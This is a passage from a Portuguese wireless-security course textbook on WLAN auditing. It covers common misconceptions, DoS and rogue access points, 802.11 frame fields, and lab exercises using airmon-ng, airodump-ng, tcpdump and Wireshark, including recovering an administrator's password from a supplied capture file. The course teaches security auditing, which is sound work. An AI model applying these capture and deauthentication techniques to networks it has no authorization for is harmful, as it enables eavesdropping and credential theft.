11 “Uso WPA-PSK e estou seguro.” 11 “Ninguém encontrará minha rede wireless.” 11 “Ataques DoS exigem equipamentos caros, de difícil acesso.” 11 “Estamos seguros porque usamos autenticação ou criptografia.” 11 “Segregamos nossa WLAN.” 11 “Não temos redes sem fio em nossa empresa.” 11 “Temos firewall.” 11 “Ninguém nos invadiria.” Existem diversas concepções erradas sobre segurança de redes sem fio, conferindo falsa impressão de segurança a quem configura uma WLAN. Pode-se dizer que hoje uma WLAN verdadeiramente segura deve contar, pelo menos, com as seguintes características:

q

11 Mecanismo de segurança: pelo menos WPA Personal (WPA-PSK) com uma senha forte, preferencialmente WPA2 Enterprise (WPA2 com 802.1x e EAP); 11 Virtual Private Network (VPN): para proteger os dados entre a estação e o ponto final da conexão, caso se queira garantir que não haja interceptação dos dados na rede de distribuição a qual o AP é conectado; 11 Políticas de acesso e monitoração: deve-se contar com políticas que definam quem tem e quem não tem acesso e com o monitoramento dos fluxos de acesso. Algumas concepções erradas divulgadas na mídia e referências sobre segurança de redes sem fio: 11 Filtro por MAC Address: filtro por endereço MAC restringe acesso em redes cabeadas, o que não acontece em redes sem fio, uma vez que em uma rede cabeada tem-se maior controle do meio (controlar o acesso a determinada porta do switch). Como em redes sem fio não existe uma forma de controlar o acesso ao meio, fica mais fácil descobrir quais endereços MAC estão liberados e alterar o endereço MAC é trivial, em Linux ou Windows; 11 WEP: WEP 40 bits pode ser quebrado em questão de minutos; o de 128 bits leva um pouco mais de tempo. A quebra depende de vários fatores, entre eles a quantidade de colisões (repetição de IV) e quantidade de tráfego coletada; 11 WPA-PSK : esse tipo de rede também é vulnerável a ataques de dicionário, bastando a captura da fase de handshaking de 4 vias (EAPOL). O uso de senhas fortes é reco mendado, tal como ocorre em diversas aplicações com acesso autorizado mediante a apresentação de senha; 11 Ninguém encontrará minha rede: qualquer cliente dentro do alcance do seu AP pode enxergar o tráfego de sua rede e, com isso, avaliar a possibilidade de ataque. Muitos administradores têm a visão de rede sem fio que o Windows oferece e, sob a plataforma
Segurança em Redes sem Fio

Linux, é possível visualizar qualquer tipo de tráfego, mesmo em canais incomuns (como 12 e 14). Mesmo que a rede esteja configurada para não fazer broadcast de SSID, ainda assim, se houver tráfego de dados na rede, é possível descobrir o SSID com ferramentas como o airodump-ng e kismet; 11 Ataques DoS: ataques de negação de serviço são simples e baratos em uma WLAN. Ferramentas como Void11, em conjunto com uma interface de rede com chipset Prism, ou mdk3 para chipsets Atheros ou Ralink, são suficientes para conduzir um ataque bem-sucedido;

50

11 Autenticação ou criptografia: usar criptografia e autenticação não protege a rede auto maticamente. Há fraquezas tanto em criptografia quanto em autenticação, e por isso é importante conhecer os riscos de cada conjunto de soluções; 11 Segregação: segregar simplesmente não elimina os riscos, já que podem ser exploradas vulnerabilidades de aplicação ou mesmo no cliente VPN; 11 Não existem redes sem fio: para afirmar que não há redes sem fio, sua organização deve ter políticas em operação, bem como auditá-las; 11 Firewall: basta um AP rogue mal configurado (intencionalmente ou não) próximo a uma janela para que o perímetro do seu firewall se estenda. O conceito de perímetro deve ser revisto; 11 Ninguém nos invadiria: os motivos de se invadir uma WLAN podem ser vários, do simples acesso gratuito à ponte a ataques diversos. Não subestime o valor de sua rede.

Segurança física
11 Não há segurança física. 11 Conter a abrangência de uma rede sem fio é muito difícil. 11 Lugares de ataque mais comuns: prédios vizinhos, apartamentos vizinhos e lobbies. 11 Vazamento de sinal. 22 Qualidade para capturar sinal – longa distância. 22 Qualidade para associação – curta distância.

q

É importante que o administrador de uma WLAN tenha um fato em mente: não há segurança física em redes sem fio. Em redes cabeadas era necessário o acesso físico – ou seja, passar por portões, portas, controle por crachá, seguranças e chaves para obter acesso a um ponto de rede. Em redes sem fio, o ponto de rede é o ar, literalmente. O controle de acesso de uma WLAN tem mais relação com o mecanismo de segurança do que com o controle da abrangência da rede. Qualquer mudança no ambiente pode causar vazamento de sinal da WLAN, desde a simples retirada de um móvel até a instalação de divisórias.

Wardriving
11 Termo cunhado por Peter Shipley em 1999. 11 Busca por redes sem segurança.

q
Capítulo 3 - Auditoria em redes sem fio (parte 1)

11 Wardialing: popularizado pelo filme War Games (1983). 11 DEFCON 9 (2001): 22 Maior conferência hacker do mundo. 11 Segurança de redes sem fio, tema recorrente em conferências hacker. War Games (1983) é o nome de um filme que influenciou, em alguns pontos, a cultura da segurança computacional. Termos como firewall e backdoor eram novidade em 1983: 11 Wardialing : nome dado à discagem para números aleatórios em busca de um compu tador com modem, mostrada em uma cena do filme; 11 DEFCON: Defense Condition, sigla do exército norte-americano para a condição de defesa da América do Norte. Temos desde DEFCON 5, para tempos de paz, até DEFCON 1, para prontidão máxima das Forças Armadas.

51

Piggybacking
11 Termo em inglês para conexão em redes sem fio alheias. 11 Prática comum entre vizinhos e viajantes. 11 “Eu não acho que isto seja roubar.” 11 Consenso: se o dono do AP habilitou segurança (mesmo WEP), então não quer conexões de estranhos. 11 Outros problemas: 22 Uso para golpes na internet e para pedofilia – assinante do serviço é o culpado aparente. 22 Cotas de download – prejuízo financeiro para o vizinho.

q

O roubo de serviços não é novidade: há muito tempo se rouba energia elétrica e TV a cabo, por exemplo. Com redes sem fio não é diferente. É muito comum que, em áreas urbanas densas de grandes cidades, diversas redes sem fio estejam disponíveis. Nesse cenário, a proximidade entre apartamentos, salas comerciais e outros espaços de coabitação permite que uma pessoa use a rede aberta inadvertidamente. De certa forma, o culpado por essa prática é quem configura o AP: quem pratica piggybacking prefere redes fáceis de se conectar a redes com mecanismos de segurança configurados. Embora esse fato não justifique este tipo de prática, é difícil concordar com a indignação de um proprietário de AP que não se deu ao trabalho de trocar a senha-padrão. Clientes Windows, por exemplo, podem perfeitamente fazer piggybacking sem perceber ao encontrar uma rede com mesmo nome (SSID) de sua rede preferencial.

l
Saiba mais sobre piggyback no artigo “Hey neighbor, stop piggybacking on my wireless”, The New York Times: http://www. nytimes.com

Warflying
Sinais de rádio podem se propagar de maneira imprevisível. Warflying Tom Hardware’s Guide (2004). 11 1.433 APs, 1.053 sem criptografia.

q

Figura 3.1 Warflying.
Segurança em Redes sem Fio

Como já afirmamos anteriormente, o termo wardialing deu origem a diversos outros termos, notadamente wardriving. Alguns pesquisadores, entretanto, se interessaram em capturar redes a partir de um avião, o que prova que a propagação do sinal RF é de fato imprevisível. A experiência de warflying do site Tom Hardware’s Guide (2004) foi a mais notória, mas não foi a primeira.

52

DEFCON Wifi Shootout Contest
11 Quase 125 milhas (~200 Km) na edição 2005. 11 Link 802.11b sem amplificação do sinal, PCMCIA Z-Com XI-325 HP+ 802.11b 300 mW (24.7 dBm).

q

Figura 3.2 Wifi Shootout Contest/DEFCON, equipe Team iFiber Redwire.

A conferência hacker DEFCON, que acontece anualmente em Las Vegas (EUA) desde 1993, teve um novo evento adicionado às suas atividades paralelas: o Wifi Shootout Contest. Nesse campeonato, ganha quem conseguir montar uma rede Wi-Fi que transmita pela maior distância possível. A equipe Team iFiber Redwire tinha membros com todo tipo de conhecimento: soldagem, matemática, eletrônica, radioamador, programação e Linux. É interessante ligar esse experimento aos conceitos de radiofrequência abordados no Capítulo 1. Contribuíram para a quebra do recorde elementos como linha de visada, ambiente livre de interferências, reflexões, entre outras peculiaridades da região de desertos de Las Vegas.

w
Mais informações sobre o evento: 3rd Annual DEFCON Wifi Shootout Contest: http://www. wifi-shootout.com/ e DEFCON WiFI Shootout 2005: http://www. unwiredadventures. com

Divulgação de informações
11 WLAN = LAN com hub. 11 Com criptografia ou não, o tráfego pode ser capturado. 11 Não é necessário se associar ao AP para capturar. 11 Depende da combinação entre distância e ganho da antena. Da mesma forma que uma LAN com hub, em uma WLAN temos o meio compartilhado. Dessa forma, todos os clientes associados recebem uma cópia dos quadros da WLAN.

q

Existe a opção de isolar os clientes associados a um AP (variável wl0_ap_isolate do OpenWRT), mas isso ocorre somente no nível da camada 3, ou seja, no encaminhamento de pacotes. Na prática deste curso, os alunos terão a oportunidade de capturar tráfego e analisá-lo com as ferramentas Wireshark e Kismet.
Capítulo 3 - Auditoria em redes sem fio (parte 1)

Negação de serviço
Denial of Service (DoS). Três categorias: 11 Ataques ao meio: RF Jamming. 11 Fraquezas de 802.11: ataques deauth. 11 Vulnerabilidades no firmware dos clientes. Segurança = Confidencialidade, Integridade e Disponibilidade.

q

53

Denial of Service (DoS) é um jargão de segurança de redes para negação de serviço, e constitui basicamente no fato de um serviço se tornar indisponível. No caso de uma WLAN, clientes são impedidos de se associar a um AP por ação de um atacante. O próprio IEEE assume que uma WLAN é vulnerável por natureza a ataques de negação de serviço por RF Jamming, motivo da ausência de mecanismos de proteção contra este tipo de ataque. No roteiro de atividades do Capítulo 5, os alunos terão a oportunidade de experimentar comandos com ataques que forçam a “desautenticação” de clientes: uma forma de DoS, portanto.

Access points rogue
11 Usuários bem intencionados ligam APs mal configurados à rede cabeada. 11 Mudança inadvertida no perímetro da rede. 11 Firewall corporativo defende do lado errado. 11 Soluções: 22 Políticas. 22 Monitoramento. 22 Auditoria. Access points rogue representam uma das principais ameaças a redes sem fio. Podem ser plantados em uma empresa tanto por usuários desavisados quanto por um atacante que deseja ter acesso à sua rede sem ser notado. Um AP típico, que exerce o papel de gateway, oferece os serviços de DHCP, para alocação

q

dinâmica de endereços, e de NAT, para o compartilhamento de um endereço IP entre vários clientes do AP. Nesse cenário, um usuário que conecte seu AP ao ponto de rede da sua estação de trabalho poderá nunca ser notado pelo administrador da rede, uma vez que até mesmo a troca do endereço MAC da interface Ethernet que se conecta à rede cabeada é uma prática comum. Assim, ataques que partam de clientes de um AP “rogue” aparentam partir do ponto de rede do usuário, ou do ponto de rede não utilizado com o qual o atacante se infiltrou na rede. Políticas, monitoramento e auditoria são as chaves para detecção e desativação de APs “rogue”. Uma simples cláusula na política proibindo a instalação de APs sem o conhecimento da administração da rede não tem eficácia sem monitoração e auditoria efetivas.

Outros ataques
11 Redes domésticas e hotspots. 11 Exploração de vulnerabilidades do sistema operacional. 11 Worms que se propagam pelas camadas PHY e MAC.
Segurança em Redes sem Fio

q

22 Filtros de camada 3 e 4 sem utilidade. 22 Possibilidade futura. 22 Worm Cabir em celulares Bluetooth. Clientes podem estar sob a proteção de uma WLAN corporativa segura mas, quando se associam a um hotspot ou a um AP doméstico, a segurança normalmente é mais branda. O cliente fica vulnerável a ataques não necessariamente relacionados com redes sem fio, tais como exploração de vulnerabilidades em um Sistema Operacional não atualizado ou em uma estação sem firewall pessoal.

54

Bluetooth já mostrou ser vulnerável a ataques de worms, como se viu no caso do worm Cabir (Bluetooth-Worm:SymbOS/Cabir: http://www.f-secure.com/). Até o momento, worms de redes 802.11 são apenas uma possibilidade futura, mas é importante levar esse risco em consideração.

Tráfego 802.11
11 WLAN usa enquadramento 802.11 e 802.2 – Logical Link Control (LLC). 11 Ethernet: tráfego 802.3. 11 Camada MAC: 22 Mecanismos de acesso. 22 Suporte à fragmentação. 22 Entrega confiável de pacotes. 22 Separação de redes por BSSID. 22 Privacidade com WEP. 22 Gerenciamento de energia.

q

Neste capítulo será apresentada uma visão geral da camada MAC de 802.11, com a descrição dos principais campos dos quadros, entre outros conceitos importantes. No roteiro de ativi dades práticas deste capítulo, serão exercitadas a captura e a análise de tráfego. A camada MAC é especificada na ISO/IEC 8802-11:1999. As placas de rede atuais não permitem operação em full-duplex com apenas um transmissor, não sendo possível implantar Carrier Sense Multiple Access (CSMA) ou Collision Avoidance ou (CA). Além disso, não é possível uma detecção de colisões confiável em rádio, o que é resolvido pelas mensagens Request To Send (RTS) ou Clear To Send (CTS), um mecanismo virtual de sensibilidade ao sinal da portadora. 11 Fragmentação: pouco usada na prática, possibilita sinal de tráfego malicioso dividido em vários quadros. Em 802.11, a Maximum Transmission Unit (MTU) é de 2.300 bytes, enquanto em Ethernet, por default, é de 1.500 bytes. 11 Confiabilidade: o recebimento de cada pacote de dados é reconhecido como mais confiável, embora implique em mais overhead, já que dois pacotes são trocados antes que se possa efetivamente transmitir.
Capítulo 3 - Auditoria em redes sem fio (parte 1)

11 Wired Equivalent Privacy (WEP): confidencialidade dos dados trocados, será assunto do Capítulo 6. 11 Basic Service Set Identifier (BSSID): endereço único de 48 bits que identifica de maneira única um AP e um conjunto de estações sem fio (STA). Economia de energia também é considerada nessa especificação, de forma que o consumo de energia seja compatível com dispositivos móveis, como um Personal Digital Assistant (PDA) e laptops.

Arquitetura IBSS
11 Independent Basic Service Set network 11 Peer to peer (ad-hoc). 11 Aplicações: troca de arquivos, algumas implementações de redes mesh baseadas em 802.11.

q

55

Infraestrutura: 11 Figura do Access Point (AP). 11 Funções típicas: segurança, ponto central de acesso à rede de distribuição. Implementações de redes de infraestrutura: 11 Basic Service Set (BSS): agrupamento de uma ou mais estações e um AP. 11 Extended Service Set (ESS): múltiplas redes BSS que compartilham um mesmo ESS, permitindo roaming entre APs.

q

11 WDS: relay entre dois APs, podendo ser utilizado para ligar duas redes cabeadas através de uma rede sem fio.

802.1x
11 Autenticação. 11 Controle de acesso baseado em portas. 11 Autenticação antes do acesso às portas solicitado pelo Supplicant. 11 Apenas tráfego EAP (EAP Over Lan – EAPOL) é permitido antes da conclusão da autenticação. 11 Authenticator (normalmente AP) repassa as mensagens EAP para o Authentication Server (RADIUS).

q

Extensible Authentication Protocol (EAP) é um protocolo de transporte para autenticação, e não o método de autenticação em si. Os tipos de EAP definem como as credenciais são trocadas. Alguns métodos estão relacionados a seguir, enquanto a lista completa encontra-se dispo nível no site da IANA. Abordaremos EAP com mais detalhes nos Capítulos 9 e 10, em que projetaremos e implantaremos uma rede segura baseada em métodos EAP e EAPOL. 11 EAP-MD5; 11 LEAP (Lightweight EAP); 11 EAP-TLS; 11 EAP-TTLS; 11 PEAP (Protected EAP); 11 EAP-MSCHAPv2.

56

Segurança em Redes sem Fio

Rede sem fio

Servidor de autenticação (RADIUS)

2

Au
Figura 3.3 Conceitos do 802.1x: requerente, autenticador, rede sem fio, servidor de autenticação e internet ou outros recursos de rede.

thenticator

1 Internet ou outros recursos LAN

Supplicant

3

IEEE 802.11
Três tipos: 11 Management: Beacons, probes e autenticação.

q

w
Saiba mais sobre o EAP em http://www.iana.org.

11 Control: reconhecimento de recebimento de pacotes. Data: 11 Encapsula dados do usuário (como IP e ARP). 11 Únicos pacotes com aplicação de criptografia.

Octetos: 2
Frame Control

2 Duration / ID

6 Address 1

6 Address 2

6 Address 3

2 Sequence Control

6 Address 4

0-2312 Frame Body

4 FSC

Cabeçalho MAC

Protocol Version

Type 2

Subtype 4

To Ds 1

From Ds 1

More Retry Frag 1 1

Pwr Mgt 1

More Data 1

WEP 1

Order 1

Bits: 2
Figura 3.4 Quadros 802.11 – Cabeçalho.

Campos do cabeçalho 802.11: 11 Frame Control (FC); 11 Duration/ID; 11 Address 1; 11 Address 2; 11 Address 3;

Capítulo 3 - Auditoria em redes sem fio (parte 1)

57

11 Sequence Control; 11 Address 4; 11 Data: o tamanho máximo do campo de dados antes de qualquer criptografia é de 2.304 bytes, mas o payload real depende do tipo de criptografia aplicada. 2.312 bytes para WEP: adiciona 4 bytes. 2.324 bytes para TKIP (WPA): adiciona 20 bytes. 2.320 bytes para CCMP (WPA2): adiciona 16 bytes. 11 Frame Check Sequence (FCS): CRC para verificação de integridade. 11 2 bytes (16 bits), 11 opções. 11 Especifica se o quadro é de gerenciamento, dados ou controle. 11 Determina o formato do restante do quadro. Protocol Version To Ds 1 From Ds 1 More Retry Frag 1 1 Pwr Mgt 1 More Data 1

q

Type 2

Subtype 4

WEP 1

Order 1

Bits: 2

11 Protocol Version (2 bits): número do protocolo; na prática, o valor é sempre 0 (zero). 11 Type (2 bits): especifica se é um quadro de gerenciamento, controle ou dados. O campo Subtype (4 bits) especifica subtipos de quadros de controle, gerenciamento ou dados. A lista completa com as 26 combinações de type ou subtype pode ser encontrada na seção 7.1.3.1 do documento ANSI/IEEE Std 802.11. Alguns exemplos: 22 00/0000: Management, Association Request. 22 00/0100: Management, Probe Request. 22 00/1000: Management, Beacon (informações para associação). 22 00/1101-1111: Management, Reservado. 22 01/1011: Control, RTS. 22 01/1100: Control, CTS. Os 8 bits restantes são usados para ativar ou desativar opções: 11 To DS: ativado quando o quadro possui o sistema de distribuição como destino, normal mente representado pelo AP; 11 From DS: ativado quando tem como origem o sistema de distribuição; 11 More Frag : ativado no caso de existirem mais fragmentos do quadro na sequência; 11 Retry : ativado quando o quadro é uma retransmissão;
Segurança em Redes sem Fio

Figura 3.5 Quadros 802.11 – Frame Control (FC).

11 Power Mgmt: ativado para notificar que a estação encontra-se em modo de economia de energia; 11 More Data: ativado quando a estação avisa que saiu do estado de economia de energia; 11 WEP: ativado quando WEP está habilitado no Basic Service Set (BSS), agrupamento de estações (STA) e um AP; 11 Strict Order: quando ativado, determina que os quadros devem ser recebidos na sequência em que foram enviados; caso contrário, devem ser descartados.

58

Quadros 802.11
Demais campos. Duration/ID: 11 Tempo estimado de ocupação do meio para uma transmissão de dados. 11 Sequence control. 22 Fragmentação para frames de dados e gerenciamento. 22 Quando o payload é maior que 2312 bytes. 22 4097 iterações (0-4096). 22 Pouco usado. 11 Frame Check Sequence (FCS). 22 Verificação da integridade do quadro no recebimento por CRC 32. Quadros de gerenciamento: 11 Dados de gerenciamento montados no payload. 11 Campos: 22 Fixed Parameters. 33 BSS Timestamp, Intervalo de beacon e capability information. 22 Tagged Parameters: 33 Tag Number, Tag Lengh e Tag. 33 Exemplo: SSID ESR: 0, 03, 45 83 82. 33 Outros Tag numbers: Supported Rates (1) e Canal/DS Parameter set (11). Análise – Flags “To DS” e “From DS” (Frame Control): 11 To DS ativado – Origem em uma estação sem fio. 22 Endereços: MAC Destino, BSSID, MAC Origem. 11 From DS ativado: origem na rede cabeada (AP). 22 Endereços: MAC BSSID, Origem, MAC Destino. 11 Ambos ativados: Wireless Distribution System (WDS). 22 Endereços: Receptor, Transmissor, MAC Destino e MAC Origem. 22 4º endereço (MAC Origem) existe somente nesse caso e depois do campo Sequence Control. 11 Ambos desativados: rede ad-hoc. 22 Endereços: MAC Destino, MAC Origem e BSSID.

q

Captura
11 Ethernet utiliza enquadramento IEEE 802.3. 11 WLAN: 802.11 + sub-header 802.2 (Logical Link Control – LLC). 11 O tipo de tráfego depende do modo de operação da interface de rede. 11 Captura em modo cliente (managed) mostra tráfego aparentemente de Ethernet.

q

Capítulo 3 - Auditoria em redes sem fio (parte 1)

59

Modos de operação das interfaces de rede
Managed: 11 Mais comum, associação a um Access Point (rede BSS). 11 Captura mostra tráfego de uma rede Ethernet (802.3). 11 A captura de pacotes é feita somente quando o cliente que a efetua está associado. 11 Revela poucos dados sobre a rede para um auditor. Monitor: 11 Chamada também de RFMON. 11 Captura quadros no formato em que foram enviados (802.11+ 802.2). 11 Revela tráfego de gerenciamento: 11 quadros de dados, gerenciamento e controle. 11 Não é necessária a associação. 11 Depende de drivers ( 11 comum em Linux, limitado em Windows). 11 Captura em um canal por vez. Master: 11 Access Point. 11 Permite a criação de um Access Point baseado em uma estação. Ad-hoc: 11 Redes IBSS ponto-a-ponto. A captura em modo monitor é a mais interessante para o auditor. Da mesma forma que

q

captura qualquer tipo de tráfego da rede, permite que o auditor fique “invisível” aos Access Points, ou seja, não transmite pacotes para conduzir a auditoria. Esse tipo de captura infelizmente tem algumas limitações, entre elas: 11 Não permite que a interface se associe a um AP, isto é, em modo monitor a interface somente é capaz de capturar pacotes; 11 Em sistemas Windows é possível somente com hardware e software especiais; 11 Captura um canal por vez; enquanto a interface captura em um canal, todos os outros não estão sendo monitorados. A solução para esse problema seria o uso de pelo menos 11 interfaces de rede simultâneas, cada uma delas monitorando um canal distinto. Outra solução, mais viável, é implementada em softwares de auditoria como airodump-ng e kismet. Trata-se do channel hopping, uma técnica que configura a interface em um canal por alguns segundos e vai alternando sequencialmente entre os canais disponíveis, moni Segurança em Redes sem Fio

torando assim todo o espectro disponível.

60

Roteiro de Atividades 3
Atividade 3.1 – Captura e análise de tráfego em sistemas Windows
Neste exercício você verá, na prática, quais são as diferenças entre as capturas de tráfego de sistemas Windows e Linux. Começaremos pelo sistema Windows, que apresenta mais limitações. Localize e execute o utilitário Wireshark em sua estação.
1. Execute o utilitário, e depois selecione o menu “Capture” > “Options”.

Figura 3.6 Wireshark.

Na janela anterior, você iniciará duas capturas diferentes: uma com a opção “Capture packets in promiscuous mode” marcada; e outra com a mesma opção desmarcada. O que aconteceu em cada um dos experimentos? Como é o funcionamento de uma interface Ethernet em modo promíscuo e como você esperava que fosse o comportamento desse modo na interface 802.11?

Capítulo 3 - Roteiro de Atividades

61

2. Repita o experimento anterior, depois de ter associado o cliente a um AP. Provoque algum

tipo de tráfego (HTTP, ICMP etc.) e observe qual tipo de tráfego o Wireshark captura com e sem a opção “promiscuous” marcada. O que você notou de diferente nessa experiência? A essa altura do experimento, você já deve ter constatado que só é possível capturar tráfego da interface WLAN quando o cliente está associado. E não é só isso: apenas tráfego desti nado a broadcast e à própria interface é capturado, ou seja, uma vez associada à interface 802.11, para Wireshark não há diferença em relação a uma interface Ethernet. Note ainda que a captura ocorre em apenas um canal: o canal da rede à qual o cliente se associou.

Atividade 3.2 – Captura e análise de tráfego em sistemas Linux
Agora que você constatou que a captura de tráfego 802.11 é limitada em sistemas Windows, você está pronto para comparar os dois sistemas.

Capturando tráfego
Revendo os conceitos do Roteiro de Atividades 2, certifique-se de que a interface WLAN está instalada e ativa. Agora você irá configurar a interface em modo Monitor. Nesse modo, a interface é capaz de capturar não apenas quadros (pacotes da camada MAC) de dados, como também de controle e gerenciamento. Para começar a explorar esse novo universo de captura de tráfego, iniciaremos configu rando a interface de rede. A interface que temos em nosso laboratório é Ralink; por isso usaremos wlan0 como nome do dispositivo. Para ativar a interface em modo monitor, utilizaremos um script do pacote aircrack-ng, que simplifica esse processo executando os comandos iwconfig e iwpriv com os parâmetros necessários para cada driver:

# airmon-ng start wlan0 Interface Chipset Driver wlan0 Ralink 2573 USB rt73usb - [phy0]

(monitor mode enabled on mon0)

Alguns drivers como os dos chipset Atheros e Ralink suportam a criação de interfaces virtuais e essa característica permite que em uma única interface física, seja possível criar uma interface virtual em modo monitor e manter outra interface virtual em modo Managed. Com isso, pode-se por exemplo capturar e injetar pacotes em uma mesma interface física. Após executar esse comando, é criada uma interface (mon0 no nosso caso), que permite a captura de qualquer tipo de quadro 802.11 (gerenciamento, controle e dados), mas impõe duas limitações: a captura acontece em apenas um canal por vez e, enquanto a interface estiver nesse modo, não é capaz de se associar a uma rede (interface em modo Managed). Assim, o valor do SSID é irrelevante para uma interface nesse modo de operação.
Segurança em Redes sem Fio

Um parâmetro que pode ser passado para o comando airmon-ng é o canal que deseja monitorar. Isso pode ser feito através do comando airmon-ng no momento de sua primeira exe cução ou com o comando iwconfig após a execução do airmon-ng. Caso não seja passado o parâmetro do canal para o airmon-ng, a interface estará apta para realizar channel hopping.

62

Exemplos:

# airmon-ng start wlan0 2 ou # iwconfig mon0 channel 2
Capturar tráfego em Linux com a interface em modo Managed é o mesmo que capturar em sistemas Windows, ou seja, é necessário que haja associação. Para capturar em modo Monitor, basta iniciar algum utilitário de captura; usaremos TCPdump como exemplo:

# tcpdump –i mon0 –s 65535 –n –w captura-monitor.pcap
Com esse comando, todo o tráfego será capturado e salvo no arquivo captura-monitor.pcap. O formato dos arquivos gerados pelo TCPdump é compatível com Wireshark. Outra forma de capturar o tráfego IEEE 802.11 é através do aplicativo Airodump-ng, que faz parte do pacote aircrack-ng. Nesta atividade vamos capturar tráfego no canal 6, assim configure a interface em modo monitor no canal 6.

# airmon-ng start wlan0 6 ou # iwconfig mon0 channel 6
Memorize esse aspecto dos canais. Ele será essencial nas capturas de tráfego das práticas de WEP e WPA. Capture os pacotes 802.11 e os salve no arquivo teste-01.cap. Se você repetir o comando sem apagar teste-01.cap, será criado um novo arquivo (teste-02.cap). Para especificar um canal, utilize o parâmetro --channel do airodump-ng:

# airodump-ng –w teste mon0 --channel 6 CH 6 ][ Elapsed: 0 s ][ 2008-10-01 01:37

BSSID ESSID

PWR RXQ Beacons

#Data, #/s CH MB ENC CIPHER AUTH

00:16:B6:xx:xx:xx 00:1C:10:32:xx:xx 00:1C:10:C5:xx:xx 2

1 0

0

1 10 17

0 1

0 0 6

6 48 WEP WEP 6 48 WPA TKIP 0

Soluciones PSK ap1 PSK ap2
Capítulo 3 - Roteiro de Atividades

57 100

6 48 WPA TKIP

BSSID

STATION

PWR

Rate Lost Packets Probes 2 37 0- 1 0- 1 0 11 0 5 homeap1 7 homeap2 6

(not associated) (not associated)

00:21:5D:xx:xx:xx 00:1C:BF:xx:xx:xx

00:1C:10:xx:xx:xx 00:1E:52:xx:xx:xx

65 54-48

63

Analisando tráfego
Agora, é hora de abrir o arquivo salvo no exercício anterior e, para tanto, usaremos o utili tário Wireshark, por se tratar de um software que possui uma apresentação mais didática dos pacotes.

Figura 3.7 Opções de captura do Wireshark.

Com base no que foi aprendido na parte teórica, use o analisador de tráfego Wireshark para selecionar pelo menos dois subtipos de cada tipo de quadro: 11 Quadros de Gerenciamento: Beacons, Probe Requests, Probe Responses, Deauthentication, Authentication, Association Request, Association Response etc.; 11 Quadros de Controle: RTS, CTS, ACK; 11 Quadros de Dados. Use display filters do Wireshark para selecionar esses quadros específicos. Explique brevemente a função do subtipo selecionado. A seguir, alguns tipos de filtros que podem ser utilizados:

data wlan.fc.wep = 1 wlan.mgt.fixed.beacon wlan.fc.type_subtype = 8

(pacotes de dados) (pacotes com WEP habilitados) (pacotes com beacons) (beacons) (pacotes com determinada string) (pacotes de determinado endereço MAC)

frame contains “string” wlan.sa! = MAC
Segurança em Redes sem Fio

64

Atividade 3.3 – Vazamento de informações em redes Wi-Fi
Cenário: você é um analista de segurança e deseja provar a vulnerabilidade de uma rede Wi-Fi sem criptografia. Para isso, solicita à diretoria permissão para realizar uma auditoria na rede, com o intuito de provar que dados sigilosos podem ser obtidos com muita facilidade por qualquer usuário que tenha conhecimento em ferramentas de análise de redes Wi-Fi. Após obter a autorização da diretoria, você executa os procedimentos de auditoria e detecta uma falha que pode possibilitar o vazamento de informações. Explica-se: ao fazer a auditoria e verificar o tráfego da rede, você conseguiu obter vários dados de um administrador de redes que, naquele momento, acessou a interface web de administração de um Access Point via Wi-Fi. Entre os dados coletados estavam o nome de usuário e senha de acesso do administrador. O arquivo PCAP capturado durante a auditoria está disponível em /root/Desktop/SEG6/http_leak.pcap. Analise o arquivo e responda às perguntas:
1. Qual é o SSID da rede Wi-Fi?

2. Qual é o canal utilizado pela rede?

3. Qual é o endereço IP da máquina utilizada pelo administrador de redes?

4. Qual é o endereço IP do AP?

5. Qual é o Sistema Operacional utilizado pelo administrador de redes?

6. Qual é o servidor web utilizado pelo Access Point?

7. É possível descobrir qual é o Access Point (marca ou modelo)?

8. Qual é o usuário e senha para acessar a interface de administração web do Access Point?

Capítulo 3 - Roteiro de Atividades

65

66

Segurança em Redes sem Fio

4
Auditoria em redes sem fio (parte 2)
objetivos
Apresentar algumas metodologias de auditoria de redes sem fio e as principais ferramentas livres disponíveis; mapear e ensinar estratégias de auditorias com GPS e redes sem fios.

conceitos

Auditoria em redes sem fio; ferramentas de auditoria.

Introdução
11 Metodologias de auditoria. 11 Ferramentas de auditoria. 11 Mapeando com Global Positioning System (GPS).

q

Neste capítulo, abordaremos técnicas e ferramentas de auditoria de redes sem fio. Aborda remos o mapeamento com uso de Global Positioning System (GPS), possível de ser realizado por ferramentas livres ou comerciais. Nosso enfoque estará em NetStumbler e Kismet, ferramentas livres disponíveis para Windows e Linux, respectivamente.

Exercício de nivelamento 1 e Ataques a redes sem fio
Quais são os principais tipos de ataques a redes sem fio?
Capítulo 4 - Auditoria em redes sem fio (parte 2)

Metodologias de auditoria
Auditoria contra determinada política. 11 Antes: 22 Política em mãos, dados já coletados. 22 Conhecer os equipamentos típicos, marcas de produtos. 22 Autorização.

q

67

11 Buscar desvios: 22 Cláusulas da política de segurança não obedecidas. 22 Correlacionar dados coletados com a política de segurança. É importante lembrar que uma auditoria é feita em relação a uma determinada política.

q

Assim, o auditor deve ter pleno acesso à política da organização, de forma que possa avaliar corretamente quais são os desvios com relação à norma. Embora a auditoria de redes sem fio normalmente não envolva acesso, é importante que se tenha autorização prévia da gerência do setor auditado. O código de práticas ISO/IEC 17799:2005 conta com alguns controles que citam redes sem fio de maneira explícita: 11 10.6.1 Network Controls (Network Security Management); 11 10.8.1 Information exchange policies and procedures (Exchange of information); 11 11.4.2 User authentication for external connections (Network access control); 11 11.4.5 Segregation in networks (Network access control); 11 11.7.1 Mobile computing and communications (Mobile computing and teleworking); 11 11.7.2 Teleworking (Mobile computing and teleworking). Nem sempre redes e dispositivos sem fio estão incluídos na política de segurança adotada. Outros objetivos de uma auditoria: 11 Identificar APs e clients. 11 Configuração. 11 Mapear abrangência da rede. 11 Avaliar o grau de divulgação de informações da organização. Nem sempre a organização possui uma política de segurança. Mesmo quando implantada, é comum que não existam requisitos de segurança em dispositivos móveis e redes sem fio. A implantação completa de uma política de segurança para redes e dispositivos sem fio envolve a política implantada, monitoramento e auditoria. Outros objetivos de uma audi toria, seja feita contra uma determinada política ou não: 11 Identificar APs e clientes: a auditoria permite que o administrador conheça os APs e clientes ativos na área da empresa. Conhecer esses dados permite a adoção de medidas contra APs “rogue” e falsos – que se fazem passar por APs da empresa, por exemplo; 11 Configuração: o resultado de uma auditoria pode atestar que a empresa adota meca nismos de segurança considerados bons na WLAN, da mesma forma que pode provar que o mecanismo determinado pela política não foi adotado. Um AP com senha-padrão ou uma rede configurada com WEP em vez de WPA são exemplos de desvios, se uma
Segurança em Redes sem Fio

q

